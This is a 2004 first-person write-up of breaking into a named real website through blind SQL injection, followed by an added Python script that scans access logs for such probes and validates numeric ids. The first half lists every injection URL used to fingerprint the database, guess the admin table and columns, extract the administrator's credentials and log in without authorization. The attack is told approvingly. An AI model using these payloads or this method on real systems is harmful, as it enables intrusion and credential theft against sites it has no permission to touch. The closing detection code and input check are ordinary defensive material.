As a representative of domestic crack software websites, 凡 (http://www.crsky.net) had closed its forum for a while because of security problems. I happened to wander over to the main site and, ha, the announcement system actually has a SQL injection vulnerability. Hence the following article...
Start with:
http://www.crsky.net/zhnew/show.asp?id=26 and 1=1 : tried it, no error. Ha, there is hope...
http://www.crsky.net/zhnew/show.asp?id=26 and 1=2 : error. It looks like there is a SQL injection vulnerability...
First, determine the database type.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count(*) from sysobjects)>0 : error...
So it is probably Access.
Next, guess the table name...
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count(*) from admin)>=0 : ha, returns normal... Got a table name right away...
Then guess the username field.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select count(user) from admin)>=0 : error, so it seems there is no user field.
Try http://www.crsky.net/zhnew/show.asp?id=26 and (select count(username) from admin)>=0 : dizzy, still wrong...
......
Finally http://www.crsky.net/zhnew/show.asp?id=26 and (select count(name) from admin)>=0 returns normal... We have the username field too: name.
Then I have to guess the password field.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count(password) from admin)>=0 : wrong, keep guessing...
......
Finally http://www.crsky.net/zhnew/show.asp?id=26 and (select count(pwd) from admin)>=0 : ha, normal... We have the password field: pwd.
Gosh... really tired... Take a sip of water.
Guess the username...
First, the length of the username.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select top 1 len(name) from admin)>2 : returns normal.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select top 1 len(name) from admin)>4 : error.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>3 : normal.
So the username length is 4. Regardless of whether the password is encrypted, get the username first.
Guess the first character of the username...
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name,1,1)) from admin)>0 : error.
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name,1,1)) from admin)<128 : returns normal.
http://www.crsky.net/ennew/show.asp?id=26 and (select top 1 asc(mid(name,1,1)) from admin)>1 : error!!! It seems the ASC code is negative, so it is Chinese...
......
Guessed username: escape Xiaolong
Guess the password...
First, the length of the password.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>2 : returns normal.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select top 1 len(pwd) from admin)>4 : error.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>3 : normal.
The password length is also 4. Ha... Could it be the same as the username?...
Never mind that for now; I don't know where the admin login is...
Guess... http://www.crsky.net/ennew/index.asp : wrong......
http://www.crsky.net/ennew/login.asp : found...
Try "escape Xiaolong" as both the username and the password...
Success!!!!!!
I posted an announcement to alert the webmaster... See http://www.crsky.net/ennew/show.asp?id=31
Tired... Going to sleep... 2004.8
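Every step above relies on the same thing: a numeric id parameter is concatenated into a query, and the server answers "normal" or "error" depending on whether the appended condition is true. The following Python script is an added example, not code from the write-up or from the site it describes; it reads constructed IIS-style access log lines (placeholder path, assumed field layout, hand-picked pattern set) and flags the request shapes this kind of probing leaves behind, reports where the same parameter answered differently to "and 1=1" versus "and 1=2", and shows the strict integer check that, applied to the id parameter before it reaches SQL, would have made every one of those requests fail:

```python
"""Added example (not from the write-up or the site it describes): spot the
request shapes used in boolean-based blind SQL injection in access logs, and
show the strict integer check that stops them at the parameter.

Assumptions: an IIS-style log layout (date time method uri-stem uri-query
status), a placeholder path, and a hand-picked pattern set. All log lines
below are constructed."""
import re
from urllib.parse import parse_qs

# Constructed log lines; the path is a placeholder, not a real site's.
SAMPLE_LOG = """\
2004-08-01 10:00:01 GET /news/show.asp id=26 200
2004-08-01 10:00:05 GET /news/show.asp id=26+and+1=1 200
2004-08-01 10:00:07 GET /news/show.asp id=26+and+1=2 500
2004-08-01 10:00:12 GET /news/show.asp id=26+and+(select+count(*)+from+admin)>=0 200
2004-08-01 10:00:20 GET /news/show.asp id=26+and+(select+top+1+len(name)+from+admin)>2 200
2004-08-01 10:00:25 GET /news/show.asp id=26+and+(select+top+1+asc(mid(name,1,1))+from+admin)>0 500
2004-08-01 10:01:00 GET /news/show.asp id=27 200
"""

# Each tag names one building block of the probing described in the write-up.
PATTERNS = {
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),   # and 1=1 / and 1=2
    "subquery": re.compile(r"\(\s*select\b", re.I),                   # (select ... from ...)
    "string_func": re.compile(r"\b(?:len|asc|mid|count)\s*\(", re.I), # length / char extraction
    "sys_table": re.compile(r"\bsysobjects\b", re.I),                 # database fingerprinting
}


def classify_value(value):
    """Return the sorted list of tags matching one decoded parameter value."""
    return sorted(tag for tag, rx in PATTERNS.items() if rx.search(value))


def scan_log(text):
    """Return one finding per request parameter whose value matches any pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 6:
            continue  # not a request line in the assumed layout
        _date, _time, _method, stem, query, status = fields[:6]
        # parse_qs decodes '+' and %xx escapes, so values are plain text here.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                tags = classify_value(value)
                if tags:
                    findings.append({"line": lineno, "path": stem, "param": name,
                                     "value": value, "status": status, "tags": tags})
    return findings


def probe_pairs(findings):
    """Group tautology findings by (path, param) and keep those where the server
    answered with more than one status: the true/false differential the probing
    depends on, and the strongest single signal in a log."""
    by_key = {}
    for f in findings:
        if "tautology" in f["tags"]:
            by_key.setdefault((f["path"], f["param"]), set()).add(f["status"])
    return {k: sorted(v) for k, v in by_key.items() if len(v) > 1}


ID_RE = re.compile(r"\d{1,9}")


def parse_numeric_id(raw):
    """Strict check for a numeric id parameter: digits only, bounded length.
    Returns the int, or None; anything rejected here never reaches the SQL."""
    raw = raw.strip()
    if not ID_RE.fullmatch(raw):
        return None
    return int(raw)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {f['tags']} (status {f['status']})")
    print("differential probes:", probe_pairs(found))
    for candidate in ("26", "26 and 1=1", "26 and (select count(*) from admin)>=0"):
        print(f"parse_numeric_id({candidate!r}) = {parse_numeric_id(candidate)}")
```

The validation function is the half of the fix that belongs at the parameter; the other half is building the query with a parameterized command instead of string concatenation, so that even a value that slips past validation is treated as data rather than SQL. The log scanner is deliberately narrow: it keys on the shapes that appear in the write-up rather than on a generic keyword list, which keeps false positives low on ordinary traffic, and `probe_pairs` is the check worth alerting on first, since a legitimate user never sends the same id with `and 1=1` and `and 1=2` back to back.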